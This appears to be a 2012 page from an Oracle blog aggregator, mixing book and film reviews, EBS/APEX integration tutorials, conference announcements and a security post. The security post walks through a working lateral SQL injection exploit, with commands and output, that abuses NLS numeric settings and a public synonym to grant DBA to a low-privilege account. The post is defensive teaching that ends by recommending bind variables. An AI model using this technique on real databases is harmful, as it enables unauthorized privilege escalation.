ORACLE-BASE Blog Aggregator » Uncategorized

Repairman Jack: The Tomb…

Tim... — Mon, 06 Feb 2012 11:08:59 +0000

The Tomb is the first book in the Repairman Jack series by F. Paul Wilson.

Jack fixes things. Not washing machines and stuff like that. He fixes situations for people. It’s a job that takes him outside the law and means he has to separate himself from most of the things society think of as normal. It also recently separated him from his girlfriend when she found out his job doesn’t involve fixing household appliances. Now he’s got to fix a situation for his ex girlfriend involving a family curse that started generations ago in India.

Followers of the blog know I love The Dresden Files and the Felix Castor series. Repairman Jack hooks into exactly the same groove for me. Harry Dresden, Felix Castor and Jack are the same type of men. Strong, self-reliant and they get the job done in an action-packed way. Very appealing for a cowardly computer geek like myself… I’m looking forward to the next 14 books in the series.

Cheers

Tim…

lose ends…

Noons — Mon, 06 Feb 2012 02:21:00 +0000

Finally worked out how to change the admin email ids in the blog!For some reason I never quite fathomed, Google took the wrong email id for admin of this blog when they took over Blogger. With the result that for quite a while I had to login with a different address than my usual gmail and/or yahoo to administer this blog.It's been a pain in the you-know-what to manage, with yet one more email

E-Business Suite and APEX integration using APIs (1)

Dimitri Gielis — Sun, 05 Feb 2012 22:07:00 +0000

I didn't expect to many technical issues using E-Business Suite (EBS) APIs in APEX as it's basically a call to PL/SQL packages.

Next to that the EBS APIs seems to be well documented. I first didn't realise, but for a long time I was using the Oracle Integration Repository for EBS R11 (whereas I'm using R12).

For EBS R12 the Oracle Integration Repository ships as part of the E-Business Suite. To access it, in the Navigator menu, select the Integrated SOA Gateway responsibility, then click on the Integration Repository link.

Using the Oracle Integration Repository I would have found it more useful if I could define the number of results (maybe you can, but I didn't find that setting). At the moment I get only 10 results at a time, which is too low for me.

I also found it not that easy to find the right API to use. I guess it comes by experience. Next to that, the parameters are not always the same, so the API could be more consistent.

For example I want to create and edit a person. In the navigator I went to Human Resources Suite > Human Resource. That was logic for me. Next I looked into the list and saw Employee, so that was a logic choice for me. In there I found the HR_EMPLOYEE_API. That API allows to create an employee. So far so good, but where is the edit? I couldn't really find it, until I asked a friend and he told me to look for person. So when I went to HR Person(1) in the navigator I saw the HR_PERSON_API and in there you find the update and delete of a person.

When you look at the parameters; in HR_EMPLOYEE_API.CREATE_EMPLOYEE you see a parameter p_per_comments, in HR_PERSON_API.UPDATE_PERSON you see a parameter p_comments. It would have been easier if the parameters were consistent.

So once I got familiar with APIs, I started with the integration in my APEX app. Here are the steps to drill-down into a person from the people report (see previous post) and edit his or her email address.

Just as with the views I find it a good practice to not grant execute on the entire libraries of EBS to your own schema. I prefer to create my own packages in the APPS schema e.g. apex_api_pkg and call the correct API calls from there. The advantage is that you can add logging to your own package or do some other extra logic in there. For example APEX passes typically back values as strings, but some API calls need to be passed (next to varchar2) as a date, a number or a boolean. So you could choose to have all input strings in varchar2 in the apex_api_pkg and do the conversion inside the package to the correct one. In the below code I didn't do that, instead I went for an almost 1-on-1 mapping.

create or replace package apex_api_pkg
as

procedure update_person_email (
p_effective_date in date,
p_datetrack_update_mode in varchar2,
p_person_id in number,
p_email_address in varchar2,
p_object_version_number in out number,
p_employee_number out varchar2,
p_effective_start_date out date,
p_effective_end_date out date,
p_full_name out varchar2,
p_comment_id out number,
p_name_combination_warning out boolean,
p_assign_payroll_warning out boolean,
p_orig_hire_warning out boolean
);

end apex_api_pkg;
/

create or replace package body apex_api_pkg
as

procedure update_person_email (
p_effective_date in date,
p_datetrack_update_mode in varchar2,
p_person_id in number,
p_email_address in varchar2,
p_object_version_number in out number,
p_employee_number out varchar2,
p_effective_start_date out date,
p_effective_end_date out date,
p_full_name out varchar2,
p_comment_id out number,
p_name_combination_warning out boolean,
p_assign_payroll_warning out boolean,
p_orig_hire_warning out boolean
)
is
l_object_version_number number;
l_employee_number varchar2(4000);
l_effective_start_date date;
l_effective_end_date date;
l_full_name varchar2(4000);
l_comment_id number;
l_name_combination_warning boolean;
l_assign_payroll_warning boolean;
l_orig_hire_warning boolean;
begin
l_object_version_number := p_object_version_number;

hr_person_api.update_person (
p_effective_date => p_effective_date,
p_datetrack_update_mode => p_datetrack_update_mode,
p_person_id => p_person_id,
p_email_address => p_email_address,
p_object_version_number => l_object_version_number,
p_employee_number => l_employee_number,
p_effective_start_date => l_effective_start_date,
p_effective_end_date => l_effective_end_date,
p_full_name => l_full_name,
p_comment_id => l_comment_id,
p_name_combination_warning => l_name_combination_warning,
p_assign_payroll_warning => l_assign_payroll_warning,
p_orig_hire_warning => l_orig_hire_warning
);
end update_person_email;

end apex_api_pkg;
/

The next thing is to grant execute privileges on this package to your own user which is linked to your APEX workspace:

grant execute on apex_api_pkg to apex_ebs;

In the APEX application we create a new Form based on this procedure. I found that the APEX wizard didn't work in my case (but more on that in another post). I created a new Blank Page, add a region to it and a couple of items.

From my report I created an edit link to this new page and I pass the value of PERSON_ID to this page.

As I want to see the original data in my form (note that I didn't include all fields available in the API) I added a Fetch data process of type PL/SQL anonymous block with this code:

select full_name, email_address, effective_start_date, employee_number, object_version_number
into :P2_FULL_NAME, :P2_EMAIL_ADDRESS, :P2_EFFECTIVE_DATE, :P2_EMPLOYEE_NUMBER, :P2_OBJECT_VERSION_NUMBER
from apex_per_people_vw
where person_id = :P2_PERSON_ID;

When you hit the Apply Changes button I want the email address to update, that is why we have the Update email Process in Page Processing. The PL/SQL code is as follows:

declare
l_object_version_number number;
l_employee_number varchar2(4000);
l_effective_start_date date;
l_effective_end_date date;
l_full_name varchar2(4000);
l_comment_id number;
l_name_combination_warning boolean;
l_assign_payroll_warning boolean;
l_orig_hire_warning boolean;
begin
l_object_version_number := to_number(:P2_OBJECT_VERSION_NUMBER);

apps.apex_api_pkg.update_person_email (
p_effective_date => to_date(:P2_EFFECTIVE_DATE, 'DD-MON-YYYY'),
p_datetrack_update_mode => :P2_UPDATE_MODE,
p_person_id => to_number(:P2_PERSON_ID),
p_email_address => :P2_EMAIL_ADDRESS,
p_object_version_number => l_object_version_number,
p_employee_number => l_employee_number,
p_effective_start_date => l_effective_start_date,
p_effective_end_date => l_effective_end_date,
p_full_name => l_full_name,
p_comment_id => l_comment_id,
p_name_combination_warning => l_name_combination_warning,
p_assign_payroll_warning => l_assign_payroll_warning,
p_orig_hire_warning => l_orig_hire_warning
);
end;

I just do the necessary to update the email, I don't do that much yet with the output parameters, but you could transfer that back to the page if you wanted to. Also note that the package is in the APPS schema, so don't forget to add the owner in front of it. You could create a synonym in your own schema if you preferred. For the view I find it important to have those in my own schema too, for packages only if I wanted to add some extra logic to it.

Running the page shows you the below form.

In EBS there are different ways (UPDATE, CORRECTION, UPDATE_OVERRIDE, UPDATE_CHANGE_INSERT), to update the record, as I wanted to test them out, I added the Update Mode select list to the form. An UPDATE you can only do once per day, CORRECTION is what I used to update the same record multiple times.

Note that we still didn't login into our APEX application as an EBS user, so EBS doesn't know who I'm. As EBS is keeping an audit of the records, I (the logged in APEX user) won't be seen in those audit records, instead it will be a general one (EBS sysadmin I suppose). In the next posts we will authenticate with EBS integrate tighter.

In this post the purpose was to make an EBS API call to update an email address of a person. While playing with the EBS API I came across some challenges and I had to ask for advice to more experienced EBS people. Which will also be shown in the next post; where I will create a person with the API...

Previous related posts:

Oracle Query Optimizer Vanishing Acts

Charles Hooper — Sat, 04 Feb 2012 03:51:46 +0000

February 3, 2012 A couple of days ago I noticed an interesting thread in the comp.databases.oracle.server Usenet group that described a problem of vanishing tables. The title of the thread certainly caught my attention, and I was a bit disappointed when I found that the there was little to no magic involved in the vanishing act. The situation reported [...]

All about Security – SQL Injection redux

Thomas Kyte — Fri, 03 Feb 2012 19:53:24 +0000

I just wrote about SQL Injection yesterday - after having giving a web seminar on Wednesday the touched on the topic.

One of the comments on that post was by David Litchfield, he wrote:

Hey Tom,Funnily enough I just published a paper about doing the same thing with NUMBER concatenations. This was an addendum to a paper I wrote in 2008 on exploit DATE concatenations - the same problem you discuss here. You can get the recent paper here: http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers and the first paper here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

I read that new paper and learned something new (actually, much like David - I was kicking myself because I should have been able to see this problem coming as well. It is just a variation on a theme after all). In that paper, he demonstrates how to exploit a SQL Injection flaw using NLS settings with numbers. That is something I hadn't considered before. NLS settings for numbers are different than for dates. With a date, I can set the format string to have any string of characters I want. With numbers - you are very much restricted. On the face of it - it doesn't look like you can exploit a SQL Injection flaw with numbers like you can with dates.

But - you can. Just not as flexibly. But the end result can be as disastrous.

One of the follow on comments to this posting by David was:

the problem David mentions in http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers only arises since NUM_PROC is owned by SYS,as far as I can see, correct ?

So, it's not really a problem since nobody ever does something as SYS, correct.

In his example, David used SYS to demonstrate with - which could lead people to believe "ah, it needs SYS to exploit this flaw". But - it doesn't. All it requires is an account with these privileges:

Create session
Create procedure
Create public synonym <<<=== these guys are evil! Should be avoided

And another schema that has the ability to GRANT stuff - like DBA. It doesn't have to be DBA, it could be any privilege they have the ability to grant.

Here is how to exploit the flaw. First - read David's paper to get the background on the 'P ' NLS_NUMERIC_CHARACTERS. Then you'll understand how:

a%ORA11GR2> select .1 from dual;

----------

works. Once you have mastered that, all we need to do to exploit this type of SQL Injection flaw is this. I'll have a DBA schema containing a procedure that uses dynamic SQL with string concatenation and a number as an input:

ops$tkyte%ORA11GR2> create or replace procedure do_something( l_num in number )

2 as

3 l_query long;

4 l_cursor sys_refcursor;

5 l_rec all_users%rowtype;

6 begin

7 l_query := '

8 select *

9 from all_users

10 where user_id = ' || l_num;

11 dbms_output.put_line( l_query );

13 open l_cursor for l_query;

15 loop

16 fetch l_cursor into l_rec;

17 exit when l_cursor%notfound;

18 dbms_output.put_line( 'username = ' ||

l_rec.username );

19 end loop;

20 close l_cursor;

21 end;

22 /

Procedure created.

Then, we'll have our account with the small set of privileges:

ops$tkyte%ORA11GR2> create user a identified by a;

User created.

ops$tkyte%ORA11GR2> grant create session, create procedure,

create public synonym to a;

Grant succeeded.

and we'll allow it to access this procedure - just like in my original SQL Injection article:

ops$tkyte%ORA11GR2> grant execute on do_something to a;

Grant succeeded.

Ok, so now we'll log in as A and run the procedure to see what it does:

ops$tkyte%ORA11GR2> connect a/a

Connected.

a%ORA11GR2>

a%ORA11GR2> exec ops$tkyte.do_something( 5 );

select *

from all_users

where user_id = 5

username = SYSTEM

PL/SQL procedure successfully completed.

Now, we suspect it might use string concatenation - so we'll create a function that might be able to exploit this:

a%ORA11GR2> create or replace function foobar return number

2 authid current_user

3 as

4 pragma autonomous_transaction;

5 begin

6 execute immediate 'grant dba to a';

7 return 5;

8 end;

9 /

Function created.

And then set up our public synonym for it and allow others to execute it:

a%ORA11GR2> create public synonym p1 for foobar;

Synonym created.

a%ORA11GR2> grant execute on foobar to public;

Grant succeeded.

and now for the magic:

a%ORA11GR2> alter session set nls_numeric_characters = 'P ';

Session altered.

and viola:

a%ORA11GR2> set role dba;

set role dba

ERROR at line 1:

ORA-01924: role 'DBA' not granted or does not exist

a%ORA11GR2> exec ops$tkyte.do_something( .1 );

select *

from all_users

where user_id = P1

username = SYSTEM

PL/SQL procedure successfully completed.

a%ORA11GR2> set role dba;

Role set.

I have DBA...

SQL Injection is insidious. SQL Injection is hard to detect. SQL Injection can be avoided - by simply using bind variables. In the event a bind variable is not possible for some provable technical reason (and those events are few and far far far in between) you have to critically review that code over and over and try to think of every way it could be exploited. The problem with that however is that before yesterday - I would have looked at this code and might have said "this looks ok".

It is really hard to protect yourself from something you cannot see.

Updated a little later: Let me also say this:

If you use static sql in plsql - your code in plsql cannot be sql injected, period. It is not possible. The only way to get sql injected in plsql is to use dynamic sql - that is the only time. So, if you want maximum protection from SQL Injection - if you just want to avoid it, you will:

a) write your SQL code in PL/SQL
b) call this PL/SQL from your java/c/c#/whatever code USING BINDS to pass all inputs and outputs to/from the database

If you do that - no SQL Injection attacks are possible.

Hotsos Symposium 2012 Speaker Spotlight – Doug Gault

Becky — Fri, 03 Feb 2012 18:53:00 +0000

Doug Gault is returning to Hotsos Symposium 2012. Doug is an entertaining speaker who focuses on Oracle's Application Express. Doug Gault is a Director & Co-Founder at Sumneva, a world-class Oracle Application Express (APEX) consulting, training & solutions firm founded in 2010. He has been working with Oracle since 1988, starting with version 5.1B, SQL*Forms 2.0 and RPT/RPF. Since then he has focused his career on Oracle's development technologies, spending the last decade on web based technologies, and the last 5 years specifically on APEX. Prior to co-founding Sumneva, Gault was Vice President of Sumner Technologies, which also focused on Oracle APEX consulting, training & solutions. Before that he served as the Product Development Director for Hotsos Enterprises, during which time he was the lead architect/developer and product manager for two commercial products written in exclusively in APEX. His 21 years of Oracle experience has taken him all over the world and involved him in some truly ground-breaking projects. Gault has presented and participated in round table discussions at a number of conferences including Oracle OpenWorld, UKOUG and ODTUG's APEXposed. He holds an Associates Degree in Computer Science, and an honorary Master's Degree from The School of Hard Knocks, believing there is no replacement for hard earned experience.

Topic: Capturing Performance Data for Interesting APEX Processes

Description: One of the features of Oracle Application Express 4 is the much improved debug information now stored in the dictionary views. This data can be used to track, monitor, and identify performance trends across your APEX application. The trick is capturing instances of this information for interesting APEX processes programmatically. This session will introduce the idea of using APEX Debug data for performance trending, the techniques and information necessary for you to mine the Oracle Application Express 4 debug data, and methods for programmatically capturing runs deemed as "interesting".

If you're into ApEx, you won't want to miss Doug's presentation. Sign up today before the price goes up on Feb 11, 2012.

Captain Support: Not to the rescue…

Tim... — Fri, 03 Feb 2012 17:24:29 +0000

This morning, the display on one of my computers was a bit odd. I rebooted the machine and when it came up I got no output on the monitor. I plugged my laptop into the monitor and that worked fine, so it looked like the graphics card had died. I popped down to a local PC store and had the choice of remortgaging my house for new graphics card, or buying a cheap and cheerful one. I did the latter. Even so, the new card was much flasher than the old one.

I put the card in the machine and it booted up and I had a display again. Trouble was, GNOME shell had failed to start and I was knocked back into fallback mode, that looks a bit like GNOME2. Sigh. Forgot to check the the card against support for the ever-so-picky GNOME shell.

I now have a choice to make:

Ditch it and get a new graphics card… again…
Switch to KDE or XFCE… shudder…
Stay with the fallback option until Fedora 17, when allegedly GNOME shell will not be so bloody fussy.

I’m probably going to stick with the last option as I can’t be bothered to waste any more time on this. All of a sudden, Windows and Mac OS X don’t seem so bad after all…

Cheers

Tim…

PS. I don’t need a lecture on why GNOME shell is so picky. I know all the arguments. I’ve read all the crap. Doesn’t mean it’s not a pain in the ass when you buy a newer and more powerful graphics card and you end up with an inferior user experience.

Chronicle…

Tim... — Fri, 03 Feb 2012 16:16:02 +0000

I thought Chronicle was a cool film. Three kids find some weird object and develop super powers. How will it affect them and how will they choose to use them?

It has the “shot on my camcorder” feel, like Cloverfield, and has a kind of Akira feel to me. While I was watching it I kept expecting someone to say, “With great power comes great responsibility!”

The effects are pretty cool. At the start they look like they are going to be a bit low budget, but by the end they get pretty impressive.

Nice mix of teen angst, super powers and destruction. Obviously not targeted for 42 year old men, but it hit the mark for me. I guess that says a lot.

Cheers

Tim…

E-Business Suite and APEX integration using Views

Dimitri Gielis — Fri, 03 Feb 2012 11:36:00 +0000

Integrating APEX and EBS by using views is one of the easiest solutions (at first sight!).

This is the first scenario, where I have an APEX application and I want to integrate with data sitting in EBS.

Pre-requisites:

APEX is installed in the same database as EBS (see previous post).
My APEX application (actually Workspace) is linked to my own (non-EBS) Oracle schema.

If you want to view data coming from EBS in your APEX application, follow these steps:

Identify where the data is in EBS

If you are not familiar with the data model of EBS, it can be hard to find the right information. A good starting point would be the APPS schema, because that has access to the complete Oracle E-Business Suite data model. You can compare it with the SYSTEM schema, which has access to the entire database.

This pictures shows an overview of the APPS schema and base product schemas.

You can read more about the APPS schema in the EBS documentation.

In my example I wanted to find the people that are in my organisation (HR). I started to look for views that would give me that information. My first query was like this:

select object_name
from user_objects
where object_name like '%PEOPLE%'
and object_type = 'VIEW'
order by 1

That query returned 82 rows in my environment. In the results I saw e.g. ADS_PEOPLE_V, HRBG_PEOPLE, PER_ALL_PEOPLE, PER_PEOPLE, PER_PEOPLE_F etc.

I started to look at the definitions of those, but if you are not familiar with EBS it's hard to know which one is the one you need. So my recommendation would definitely be; when you are not that familiar with EBS, talk with somebody who knows more about it. For me that is the case, I only started to look into EBS and actually do something with it, a few weeks ago.

When I talked to somebody more experienced in EBS, he told me I probably wanted to look at PER_ALL_PEOPLE_F. Hmm, that wasn't in the result set of the above query. After investigating a bit more PER_ALL_PEOPLE_F is a synonym for HR.PER_ALL_PEOPLE_F.

I wanted to understand the naming convention in EBS a bit better e.g. for the PER%PEOPLE% objects.

Below I created a table how I interpret the EBS objects:

View /Synonym (^)	count(*)	count(distinct person_id)	Interpretation
per_all_people_f (^)	32295	18518	Synonym to real HR table
per_all_people	0	0	Needs EBS session (record inFND_SESSIONS) so it knows what you can see
per_all_people_d	32295	18518	All records but showstranslated text if user settings are applied
per_people	0	0	Needs EBS session, showseffective records based on user's date
per_people_f	32295	18518	EBS security implemented, youonly see records you are allowed to see
per_people_v	0	0	Needs EBS Session, includes alot of display text and is language dependend
per_people_x	18518	18518	EBS security implemented (sameas per_people_f), but limits to only the effective records (WHERE TRUNC(SYSDATE) BETWEEN EFFECTIVE_START_DATE ANDEFFECTIVE_END_DATE)

So to me PER_PEOPLE_X looks like a good candidate to use in my APEX application. If I'm not logged into the app as an E-Business user I still see all records that are effective at the time I run the query.

Create a view on top of the EBS views and use some naming conventions so it's easy to recognise which objects you created and are not native EBS ones.

create view apex_per_people_vw as select * from per_people_x
Grant access on that view to the schema that is linked to your APEX workspace and application

grant select on apex_per_people_vw to apex_ebs
Create a view in your own schema that selects everything from the view in the apps schema.
We do that so that the views are a one-on-one mapping between schema's, but they show up in the APEX wizards.

create view apex_per_people_vw as select * from apps.apex_per_people_vw
Create an Interactive Report on top of the view

This first examples shows how you can view data from EBS in your own APEX application. We can now create a calendar, charts etc. in APEX based on the data coming from EBS. In the next post I will show how you can edit this data.

Previous related posts:

RMOUG

Jonathan Lewis — Fri, 03 Feb 2012 09:40:51 +0000

Just a quick reminder that the Rocky Mountain Oracle User Group Training days are just eleven days away. It’s one of the best Oracle events I’ve attended, and I’ll be there again this year. There are plenty of good speakers and interesting presentations on a wide range of topics – and if you’re wandering around between sessions with nothing to do, I’ll be around too and will be happy to say hello and have a chat.

Here’s the list of things I’ve pencilled in on my timetable so far. (Some of the gaps are there because I’m doing three presentations myself, some are there because I haven’t decided what to see yet.)

Wednesday	9:15	Database I/O Performance: Measuring and Planning – Alex Gorbachev, Pythian
	10:45	Parallel Execution in RAC – Riyaj Shamsudeen, OraInternals
	16:00	Making Sense of Big Data – Gwen Shapira, Pythian
Thursday	8:30	Developing and Deploying Extremely Large Databases with Oracle 11gR2 – Daniel Morgan, Morgan’s Library
	9:45	Mining the AWR Repository for Capacity Planning, Visualization, and other Real World Stuff – Karl Arao, Enkitec
	13:30	Using Oracle Execution Plans for Performance Gains – Janis Griffin, Confio Software

If nothing else catches your eye, don’t miss out the opportunity to hear Maria Colgan talking about the optimizer. She’s doing three presenations (and only one of them coincides with one of mine) and they’re all worth hearing.